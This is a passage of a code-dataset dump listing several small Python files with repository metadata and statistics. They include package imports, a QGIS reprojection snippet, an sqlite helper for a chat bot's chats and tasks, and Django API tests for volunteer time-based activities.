] | 173 | 2018-07-05T13:59:39.000Z | 2018-08-09T01:12:03.000Z | python/testData/inspections/PyUnresolvedReferencesInspection/ReturnedQualifiedReferenceUnionType/b.py | Cyril-lamirand/intellij-community | 60ab6c61b82fc761dd68363eca7d9d69663cfa39 | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z | def f():
return 1
def g():
return 'foo'
| 8.166667 | 16 | 0.489796 | 8 | 49 | 3 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03125 | 0.346939 | 49 | 5 | 17 | 9.8 | 0.71875 | 0 | 0 | 0 | 0 | 0 | 0.061224 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 6 |
6eb17c5eb0c868654a2dfa71527e052b2a5ea225 | 39 | py | Python | pipHelloWorld/__init__.py | MartinBCN/pipHelloWorld | 64c8dc873d064a32c1178749ed2a84f468abf5a0 | [
"MIT"
] | null | null | null | pipHelloWorld/__init__.py | MartinBCN/pipHelloWorld | 64c8dc873d064a32c1178749ed2a84f468abf5a0 | [
"MIT"
] | null | null | null | pipHelloWorld/__init__.py | MartinBCN/pipHelloWorld | 64c8dc873d064a32c1178749ed2a84f468abf5a0 | [
"MIT"
] | null | null | null | from pipHelloWorld.class1 import Class1 | 39 | 39 | 0.897436 | 5 | 39 | 7 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.055556 | 0.076923 | 39 | 1 | 39 | 39 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6ec5b217e399656ea7ed4cc62ddd0aad2a702f1d | 38 | py | Python | __init__.py | thiagopyy/brainlypy | c77d69e0b57661fb1b2d83d4839e4473f9f7287e | [
"MIT"
] | 2 | 2021-11-07T13:48:58.000Z | 2021-12-24T23:56:50.000Z | __init__.py | thiagopyy/brainlypy | c77d69e0b57661fb1b2d83d4839e4473f9f7287e | [
"MIT"
] | null | null | null | __init__.py | thiagopyy/brainlypy | c77d69e0b57661fb1b2d83d4839e4473f9f7287e | [
"MIT"
] | 1 | 2022-03-11T21:50:44.000Z | 2022-03-11T21:50:44.000Z | from .brainly import search, set_lang
| 19 | 37 | 0.815789 | 6 | 38 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.131579 | 38 | 1 | 38 | 38 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
42f7c33c7483e0d66e7137a067b47e1f40c85422 | 1,116 | py | Python | PDSUtilities/plotly/__init__.py | DrJohnWagner/PDSUtilities | ffad1a02f78f46acdf4bd65d7c2eb063af7dbc13 | [
"Apache-2.0"
] | null | null | null | PDSUtilities/plotly/__init__.py | DrJohnWagner/PDSUtilities | ffad1a02f78f46acdf4bd65d7c2eb063af7dbc13 | [
"Apache-2.0"
] | 12 | 2022-01-18T06:21:03.000Z | 2022-01-20T07:29:56.000Z | PDSUtilities/plotly/__init__.py | DrJohnWagner/PDSUtilities | ffad1a02f78f46acdf4bd65d7c2eb063af7dbc13 | [
"Apache-2.0"
] | null | null | null | from PDSUtilities.plotly.ColorblindSafeColormaps import ColorblindSafeColormaps
from PDSUtilities.plotly.utilities import apply_default
from PDSUtilities.plotly.utilities import get_font
from PDSUtilities.plotly.utilities import get_shape
from PDSUtilities.plotly.utilities import get_line
from PDSUtilities.plotly.utilities import get_arrow
from PDSUtilities.plotly.utilities import get_label
from PDSUtilities.plotly.utilities import get_marker
from PDSUtilities.plotly.utilities import update_layout
from PDSUtilities.plotly.utilities import hex_to_rgb
from PDSUtilities.plotly.utilities import rgb_to_hex
from PDSUtilities.plotly.utilities import get_colors
from PDSUtilities.plotly.utilities import update_width_and_height
from PDSUtilities.plotly.utilities import update_title
from PDSUtilities.plotly.utilities import remove_ticks_and_tick_labels
from PDSUtilities.plotly.utilities import get_rows_and_cols
from PDSUtilities.plotly.create_image_subplots import create_image_subplots
from PDSUtilities.plotly.get_specs_from_mosaic import get_specs_from_mosaic
import PDSUtilities.plotly.templates as templates
| 55.8 | 79 | 0.897849 | 148 | 1,116 | 6.540541 | 0.256757 | 0.353306 | 0.409091 | 0.480372 | 0.666322 | 0.463843 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0681 | 1,116 | 19 | 80 | 58.736842 | 0.930769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6e0a69d59bd1e36f3142b55e393d86ee50e38fc1 | 280 | py | Python | opencv/sources/platforms/winpack_dldt/2020.1/patch.config.py | vrushank-agrawal/opencv-x64-cmake | 3f9486510d706c8ac579ac82f5d58f667f948124 | [
"Apache-2.0"
] | null | null | null | opencv/sources/platforms/winpack_dldt/2020.1/patch.config.py | vrushank-agrawal/opencv-x64-cmake | 3f9486510d706c8ac579ac82f5d58f667f948124 | [
"Apache-2.0"
] | null | null | null | opencv/sources/platforms/winpack_dldt/2020.1/patch.config.py | vrushank-agrawal/opencv-x64-cmake | 3f9486510d706c8ac579ac82f5d58f667f948124 | [
"Apache-2.0"
] | null | null | null | applyPatch('20200313-ngraph-disable-tests-examples.patch', 'ngraph')
applyPatch('20200313-dldt-disable-unused-targets.patch')
applyPatch('20200313-dldt-fix-binaries-location.patch')
applyPatch('20200318-dldt-pdb.patch')
applyPatch('20200319-dldt-fix-msvs2019-v16.5.0.patch')
| 46.666667 | 69 | 0.789286 | 36 | 280 | 6.138889 | 0.555556 | 0.244344 | 0.199095 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.178439 | 0.039286 | 280 | 5 | 70 | 56 | 0.643123 | 0 | 0 | 0 | 0 | 0 | 0.712727 | 0.690909 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6e0c8acb179daf05ae75b5ed4551d31d2f44d15e | 251 | py | Python | Chapter03/B06246_03_12-reproj.py | mapenthusiast/QGIS-Python-Programming-Cookbook-Second-Edition | 1b2fefdb09f614a2005976a451f882a198c6c9c5 | [
"MIT"
] | 43 | 2017-03-27T18:58:26.000Z | 2022-03-25T15:29:45.000Z | Chapter03/B06246_03_12-reproj.py | mapenthusiast/QGIS-Python-Programming-Cookbook-Second-Edition | 1b2fefdb09f614a2005976a451f882a198c6c9c5 | [
"MIT"
] | 2 | 2018-07-02T09:23:47.000Z | 2018-08-23T13:57:41.000Z | Chapter03/B06246_03_12-reproj.py | mapenthusiast/QGIS-Python-Programming-Cookbook-Second-Edition | 1b2fefdb09f614a2005976a451f882a198c6c9c5 | [
"MIT"
] | 31 | 2017-03-08T06:37:22.000Z | 2021-12-17T21:51:30.000Z | # Reprojecting a Vector Layer
# https://github.com/GeospatialPython/Learn/raw/master/MSCities_MSTM.zip
import processing
processing.runalg("qgis:reprojectlayer", "/qgis_data/ms/MSCities_MSTM.shp", "epsg:4326", "/qgis_data/ms/MSCities_MSTM_4326.shp") | 41.833333 | 128 | 0.800797 | 35 | 251 | 5.571429 | 0.685714 | 0.184615 | 0.102564 | 0.184615 | 0.225641 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033755 | 0.055777 | 251 | 6 | 128 | 41.833333 | 0.78903 | 0.390438 | 0 | 0 | 0 | 0 | 0.629139 | 0.443709 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
6e41ce0cf7259e66ea353d9182619f9ba0d08eb2 | 28 | py | Python | texts/__init__.py | PavelFryblik/DeepLearningStreamlit | 0dd52e8af25d0149e25814752f4813796bad5f87 | [
"MIT"
] | null | null | null | texts/__init__.py | PavelFryblik/DeepLearningStreamlit | 0dd52e8af25d0149e25814752f4813796bad5f87 | [
"MIT"
] | null | null | null | texts/__init__.py | PavelFryblik/DeepLearningStreamlit | 0dd52e8af25d0149e25814752f4813796bad5f87 | [
"MIT"
] | null | null | null | from texts import czechtext
| 14 | 27 | 0.857143 | 4 | 28 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 28 | 1 | 28 | 28 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6e420e11c9071cbb2fef7d31295eb455ad2f1037 | 87 | py | Python | main.py | JBizarri/concurrent-computing | ad6e67e171f8f3b5c186bd347c24b7510815e0a2 | [
"MIT"
] | null | null | null | main.py | JBizarri/concurrent-computing | ad6e67e171f8f3b5c186bd347c24b7510815e0a2 | [
"MIT"
] | null | null | null | main.py | JBizarri/concurrent-computing | ad6e67e171f8f3b5c186bd347c24b7510815e0a2 | [
"MIT"
] | null | null | null | from app.app import create_app_local
if __name__ == "__main__":
create_app_local() | 21.75 | 36 | 0.758621 | 13 | 87 | 4.153846 | 0.615385 | 0.333333 | 0.518519 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.149425 | 87 | 4 | 37 | 21.75 | 0.72973 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
284a24eb2b467441dac07c4a55b70819ee41804f | 38 | py | Python | test_pytrain/test_GaussianNaiveBayes/__init__.py | pytrain/pytrain-shallow | c873a6f11f1dd940da12e7c9a3c961507d064d9a | [
"MIT"
] | 20 | 2016-09-03T10:56:06.000Z | 2020-08-21T01:43:47.000Z | test_pytrain/test_GaussianNaiveBayes/__init__.py | pytrain/pytrain | c873a6f11f1dd940da12e7c9a3c961507d064d9a | [
"MIT"
] | 8 | 2016-11-14T12:33:38.000Z | 2017-07-14T15:43:53.000Z | test_pytrain/test_GaussianNaiveBayes/__init__.py | pytrain/pytrain | c873a6f11f1dd940da12e7c9a3c961507d064d9a | [
"MIT"
] | 7 | 2017-02-09T16:50:37.000Z | 2022-01-02T01:18:56.000Z | from test_GaussianNaiveBayes import *
| 19 | 37 | 0.868421 | 4 | 38 | 8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 38 | 1 | 38 | 38 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
289c7f2c0d39b409fdf0a305dbf1f2e4fd77e451 | 6,736 | py | Python | sql_worker.py | Allnorm/Polyglot | 5ac1463f6066c73b3325eeca214f78f01fb42edf | [
"MIT"
] | 2 | 2022-03-20T17:00:40.000Z | 2022-03-20T17:00:44.000Z | sql_worker.py | Allnorm/Polyglot | 5ac1463f6066c73b3325eeca214f78f01fb42edf | [
"MIT"
] | null | null | null | sql_worker.py | Allnorm/Polyglot | 5ac1463f6066c73b3325eeca214f78f01fb42edf | [
"MIT"
] | 2 | 2021-02-11T10:49:19.000Z | 2021-10-19T17:01:05.000Z | import logging
import sqlite3
import time
import traceback
dbname = "chatlist.db"
class SQLWriteError(Exception):
pass
def table_init():
sqlite_connection = sqlite3.connect(dbname)
cursor = sqlite_connection.cursor()
try:
cursor.execute('''CREATE TABLE if not exists chats (
chat_id TEXT NOT NULL PRIMARY KEY,
lang TEXT NOT NULL,
is_locked TEXT,
premium TEXT NOT NULL,
expire_time INTEGER,
user_id TEXT,
target_lang TEXT);''')
cursor.execute('''CREATE TABLE if not exists tasks (
message_id TEXT NOT NULL,
body TEXT NOT NULL,
region TEXT NOT NULL,
expire_time INTEGER,
chat_id TEXT NOT NULL);''')
sqlite_connection.commit()
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
logging.error("write mySQL DB failed!")
logging.error(str(e) + "\n" + traceback.format_exc())
cursor.close()
sqlite_connection.close()
def get_chat_info(chat_id, user_id=None):
sqlite_connection = sqlite3.connect(dbname)
cursor = sqlite_connection.cursor()
try:
if user_id is not None:
cursor.execute("""SELECT * FROM chats WHERE user_id = ?""", (user_id,))
else:
cursor.execute("""SELECT * FROM chats WHERE chat_id = ?""", (chat_id,))
record = cursor.fetchall()
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
logging.error("read mySQL DB failed!")
logging.error(str(e) + "\n" + traceback.format_exc())
record = []
cursor.close()
sqlite_connection.close()
return record
def get_chat_list():
sqlite_connection = sqlite3.connect(dbname)
cursor = sqlite_connection.cursor()
try:
cursor.execute("""SELECT * FROM chats WHERE premium = 'no'""")
record = cursor.fetchall()
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
logging.error("read mySQL DB failed!")
logging.error(str(e) + "\n" + traceback.format_exc())
record = []
cursor.close()
sqlite_connection.close()
return record
def update_premium_list():
sqlite_connection = sqlite3.connect(dbname)
cursor = sqlite_connection.cursor()
try:
cursor.execute("""SELECT * FROM chats WHERE premium = 'yes'""")
record = cursor.fetchall()
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
logging.error("read mySQL DB failed!")
logging.error(str(e) + "\n" + traceback.format_exc())
record = []
if record:
for current_chat in record:
if current_chat[4] < time.time() and current_chat[4] != 0:
try:
write_chat_info(current_chat[0], "premium", "no")
write_chat_info(current_chat[0], "expire_time", "0")
except SQLWriteError:
break
cursor.close()
sqlite_connection.close()
def actualize_chat_premium(chat_id):
current_chat = get_chat_info(chat_id)
if not current_chat:
return
if current_chat[0][3] == "yes":
if current_chat[0][4] < time.time() and current_chat[0][4] != 0:
try:
write_chat_info(current_chat[0][0], "premium", "no")
write_chat_info(current_chat[0][0], "expire_time", "0")
except SQLWriteError:
return
def write_chat_info(chat_id, key, value):
sqlite_connection = sqlite3.connect(dbname)
cursor = sqlite_connection.cursor()
try:
cursor.execute("""SELECT * FROM chats WHERE chat_id = ?""", (chat_id,))
record = cursor.fetchall()
if not record:
cursor.execute("""INSERT INTO chats VALUES (?,?,?,?,?,?,?);""",
(chat_id, "en", "no", "no", "0", "", "disable"))
cursor.execute("""UPDATE chats SET {} = ? WHERE chat_id = ?""".format(key), (value, chat_id))
sqlite_connection.commit()
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
logging.error("write mySQL DB failed!")
logging.error(str(e) + "\n" + traceback.format_exc())
cursor.close()
sqlite_connection.close()
raise SQLWriteError
cursor.close()
sqlite_connection.close()
def write_task(message_id, body, region, expire_time, chat_id):
sqlite_connection = sqlite3.connect(dbname)
cursor = sqlite_connection.cursor()
try:
cursor.execute("""SELECT * FROM tasks WHERE message_id = ? AND chat_id = ?""", (message_id, chat_id,))
record = cursor.fetchall()
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
logging.error("read mySQL DB failed!")
logging.error(str(e) + "\n" + traceback.format_exc())
record = []
if record:
return False
try:
cursor.execute("""INSERT INTO tasks VALUES (?,?,?,?,?);""", (message_id, body, region, expire_time, chat_id))
sqlite_connection.commit()
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
logging.error("write mySQL DB failed!")
logging.error(str(e) + "\n" + traceback.format_exc())
cursor.close()
sqlite_connection.close()
raise SQLWriteError
cursor.close()
sqlite_connection.close()
def get_tasks(lang_code):
sqlite_connection = sqlite3.connect(dbname)
cursor = sqlite_connection.cursor()
try:
cursor.execute("""SELECT * FROM tasks WHERE region = ?""", (lang_code,))
record = cursor.fetchall()
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
logging.error("read mySQL DB failed!")
logging.error(str(e) + "\n" + traceback.format_exc())
record = []
cursor.close()
sqlite_connection.close()
return record
def rem_task(message_id, chat_id):
sqlite_connection = sqlite3.connect(dbname)
cursor = sqlite_connection.cursor()
try:
cursor.execute("""DELETE FROM tasks WHERE message_id = ? AND chat_id = ?""", (message_id, chat_id,))
sqlite_connection.commit()
cursor.close()
sqlite_connection.close()
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
logging.error("write mySQL DB failed!")
logging.error(str(e) + "\n" + traceback.format_exc())
cursor.close()
sqlite_connection.close()
raise SQLWriteError
| 37.010989 | 117 | 0.592785 | 740 | 6,736 | 5.235135 | 0.12973 | 0.128033 | 0.048271 | 0.076665 | 0.824729 | 0.798141 | 0.732318 | 0.715023 | 0.715023 | 0.681724 | 0 | 0.009581 | 0.287262 | 6,736 | 181 | 118 | 37.21547 | 0.797334 | 0 | 0 | 0.66875 | 0 | 0 | 0.222536 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05625 | false | 0.00625 | 0.025 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
28a04e1f027c74e03efb03c67d2177edf6fbd031 | 32 | py | Python | pharaohCLI/__init__.py | bentheiii/Pharaoh | 5bf21c4af2318dfa40c3408887ec3879d2e5bbb3 | [
"MIT"
] | null | null | null | pharaohCLI/__init__.py | bentheiii/Pharaoh | 5bf21c4af2318dfa40c3408887ec3879d2e5bbb3 | [
"MIT"
] | null | null | null | pharaohCLI/__init__.py | bentheiii/Pharaoh | 5bf21c4af2318dfa40c3408887ec3879d2e5bbb3 | [
"MIT"
] | null | null | null | from pharaohCLI.run import main
| 16 | 31 | 0.84375 | 5 | 32 | 5.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 32 | 1 | 32 | 32 | 0.964286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
954ab34feaf10bb06084cc4c2d195daa0976665e | 101,981 | py | Python | bluebottle/time_based/tests/test_api.py | onepercentclub/bluebottle | 1e74f4bb4e2730ebc9baac2f72099961795d10a3 | [
"BSD-3-Clause"
] | 10 | 2015-05-28T18:26:40.000Z | 2021-09-06T10:07:03.000Z | bluebottle/time_based/tests/test_api.py | onepercentclub/bluebottle | 1e74f4bb4e2730ebc9baac2f72099961795d10a3 | [
"BSD-3-Clause"
] | 762 | 2015-01-15T10:00:59.000Z | 2022-03-31T15:35:14.000Z | bluebottle/time_based/tests/test_api.py | onepercentclub/bluebottle | 1e74f4bb4e2730ebc9baac2f72099961795d10a3 | [
"BSD-3-Clause"
] | 9 | 2015-02-20T13:19:30.000Z | 2022-03-08T14:09:17.000Z | import json
import urllib
from datetime import timedelta, date
from io import BytesIO
import icalendar
from django.contrib.auth.models import Group, Permission
from django.contrib.gis.geos import Point
from django.urls import reverse
from django.utils.timezone import now, utc
from openpyxl import load_workbook
from rest_framework import status
from bluebottle.files.tests.factories import PrivateDocumentFactory
from bluebottle.initiatives.models import InitiativePlatformSettings
from bluebottle.initiatives.tests.factories import InitiativeFactory, InitiativePlatformSettingsFactory
from bluebottle.members.models import MemberPlatformSettings
from bluebottle.segments.tests.factories import SegmentTypeFactory, SegmentFactory
from bluebottle.test.factory_models.accounts import BlueBottleUserFactory
from bluebottle.test.factory_models.geo import LocationFactory, PlaceFactory
from bluebottle.test.factory_models.projects import ThemeFactory
from bluebottle.test.utils import BluebottleTestCase, JSONAPITestClient, get_first_included_by_type
from bluebottle.time_based.models import SlotParticipant, Skill
from bluebottle.time_based.tests.factories import (
DateActivityFactory, PeriodActivityFactory,
DateParticipantFactory, PeriodParticipantFactory,
DateActivitySlotFactory, SlotParticipantFactory, SkillFactory
)
class TimeBasedListAPIViewTestCase():
def setUp(self):
super().setUp()
self.settings = InitiativePlatformSettingsFactory.create(
activity_types=[self.factory._meta.model.__name__.lower()]
)
self.client = JSONAPITestClient()
self.url = reverse('{}-list'.format(self.type))
self.user = BlueBottleUserFactory()
self.initiative = InitiativeFactory(owner=self.user)
self.initiative.states.submit(save=True)
self.data = {
'data': {
'type': 'activities/time-based/{}s'.format(self.type),
'attributes': {
'title': 'Beach clean-up Katwijk',
'review': False,
'is-online': True,
'registration-deadline': str(date.today() + timedelta(days=14)),
'capacity': 10,
'description': 'We will clean up the beach south of Katwijk'
},
'relationships': {
'initiative': {
'data': {
'type': 'initiatives', 'id': self.initiative.id
},
},
}
}
}
def test_create_complete(self):
response = self.client.post(self.url, json.dumps(self.data), user=self.user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.response_data = response.json()['data']
self.assertEqual(self.response_data['attributes']['status'], 'draft')
self.assertEqual(self.response_data['attributes']['title'], self.data['data']['attributes']['title'])
self.assertEqual(
self.response_data['meta']['permissions']['GET'],
True
)
self.assertEqual(
self.response_data['meta']['permissions']['PUT'],
True
)
self.assertEqual(
self.response_data['meta']['permissions']['PATCH'],
True
)
def test_create_duplicate_title(self):
DateActivityFactory.create(
title=self.data['data']['attributes']['title']
)
# Add an activity with the same title should NOT return an error
response = self.client.post(self.url, json.dumps(self.data), user=self.user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_create_disabled(self):
self.settings.activity_types = ('funding',)
self.settings.save()
response = self.client.post(self.url, json.dumps(self.data), user=self.user)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_create_no_title(self):
del self.data['data']['attributes']['title']
response = self.client.post(self.url, json.dumps(self.data), user=self.user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue(
'/data/attributes/title' in (
error['source']['pointer'] for error in response.json()['data']['meta']['required']
)
)
def test_create_as_activity_manager(self):
activity_manager = BlueBottleUserFactory.create()
self.initiative.activity_managers.add(activity_manager)
response = self.client.post(self.url, json.dumps(self.data), user=activity_manager)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_create_not_initiator(self):
another_user = BlueBottleUserFactory.create()
response = self.client.post(self.url, json.dumps(self.data), user=another_user)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_create_not_initiator_open(self):
self.initiative.is_open = True
self.initiative.states.approve(save=True)
another_user = BlueBottleUserFactory.create()
response = self.client.post(self.url, json.dumps(self.data), user=another_user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_create_not_initiator_not_approved(self):
self.initiative.is_open = True
self.initiative.save()
another_user = BlueBottleUserFactory.create()
response = self.client.post(self.url, json.dumps(self.data), user=another_user)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class DateListAPIViewTestCase(TimeBasedListAPIViewTestCase, BluebottleTestCase):
type = 'date'
factory = DateActivityFactory
participant_factory = DateParticipantFactory
def setUp(self):
super().setUp()
self.slot_url = reverse('date-slot-list')
self.data['data']['attributes'].update({
'start': str(now() + timedelta(days=21)),
'duration': '4:00:00',
})
self.slot_data = {
'data': {
'type': 'activities/time-based/date-slots',
'attributes': {
'title': 'Kick-off',
'is-online': True,
'start': '2020-12-01T10:00:00+01:00',
'duration': '2:30:00',
'capacity': 10,
},
'relationships': {
'activity': {
'data': {
'type': 'activities/time-based/dates',
'id': 0
},
},
}
}
}
def test_create_complete(self):
super().test_create_complete()
# Can't yet submit because we don't have a slot yet
self.assertEqual(
{
transition['name'] for transition in
self.response_data['meta']['transitions']
},
{'delete'}
)
def test_add_slots_by_owner(self):
response = self.client.post(self.url, json.dumps(self.data), user=self.user)
self.response_data = response.json()['data']
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
activity_id = response.json()['data']['id']
self.slot_data['data']['relationships']['activity']['data']['id'] = activity_id
response = self.client.post(self.slot_url, json.dumps(self.slot_data), user=self.user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.slot_data['data']['attributes']['title'] = 'Second meeting'
self.slot_data['data']['attributes']['start'] = '2020-12-05T10:00:00+01:00'
response = self.client.post(self.slot_url, json.dumps(self.slot_data), user=self.user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
activity_url = reverse('date-detail', args=(activity_id,))
response = self.client.get(activity_url, user=self.user)
self.response_data = response.json()['data']
# Now we can submit the activity
self.assertEqual(
{
transition['name'] for transition in
self.response_data['meta']['transitions']
},
{'submit', 'delete'}
)
def test_add_slots_by_other(self):
response = self.client.post(self.url, json.dumps(self.data), user=self.user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
activity_id = response.json()['data']['id']
self.slot_data['data']['relationships']['activity']['data']['id'] = activity_id
other = BlueBottleUserFactory.create()
response = self.client.post(self.slot_url, json.dumps(self.slot_data), user=other)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class PeriodListAPIViewTestCase(TimeBasedListAPIViewTestCase, BluebottleTestCase):
type = 'period'
factory = PeriodActivityFactory
participant_factory = PeriodParticipantFactory
def setUp(self):
super().setUp()
self.data['data']['attributes'].update({
'deadline': str(date.today() + timedelta(days=21)),
'duration': '4:00:00',
'duration_period': 'overall',
})
def test_create_complete(self):
super().test_create_complete()
self.assertEqual(
{
transition['name'] for transition in
self.response_data['meta']['transitions']
},
{'submit', 'delete'}
)
def test_create_no_location(self):
self.data['data']['attributes']['is-online'] = False
response = self.client.post(self.url, json.dumps(self.data), user=self.user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue(
'/data/attributes/location' not in (
error['source']['pointer'] for error in response.json()['data']['meta']['errors']
)
)
response = self.client.post(self.url, json.dumps(self.data), user=self.user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue(
'/data/attributes/location' in (
error['source']['pointer'] for error in response.json()['data']['meta']['required']
)
)
class TimeBasedDetailAPIViewTestCase():
def setUp(self):
super().setUp()
self.settings = InitiativePlatformSettingsFactory.create(
activity_types=[self.factory._meta.model.__name__.lower()]
)
self.client = JSONAPITestClient()
self.user = BlueBottleUserFactory()
self.activity = self.factory.create()
self.activity.refresh_from_db()
self.url = reverse('{}-detail'.format(self.type), args=(self.activity.pk,))
self.data = {
'data': {
'type': 'activities/time-based/{}s'.format(self.type),
'id': str(self.activity.pk),
'attributes': {
'title': 'Beach clean-up Katwijk',
'review': False,
'is-online': True,
'registration-deadline': str(date.today() + timedelta(days=14)),
'capacity': 10,
'description': 'We will clean up the beach south of Katwijk'
},
'relationships': {
